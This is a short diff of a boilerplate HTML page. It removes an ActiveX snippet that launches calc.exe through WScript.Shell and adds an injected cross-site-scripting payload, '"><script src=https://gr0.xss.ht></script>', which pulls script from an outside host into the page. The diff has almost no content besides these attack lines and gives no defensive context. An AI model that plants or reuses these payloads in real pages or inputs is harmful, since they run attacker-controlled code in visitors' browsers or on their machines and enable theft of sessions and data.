--- a/1.html
+++ b/1.html
@@ -1,14 +1,8 @@
   GNU nano 4.8                                                                                          p.html                                                                                                     
 <!DOCTYPE html>
 <html>
-  <script>function launchCalc()
-{
- WshShell = ActiveXObject("WScript.Shell")
- WshShell.Run("calc.exe")
-}
-</script>
 <body>
-
+"><script src=https://gr0.xss.ht></script>
 <h1>My First Heading</h1>
 <p>My first paragraph.</p>
 
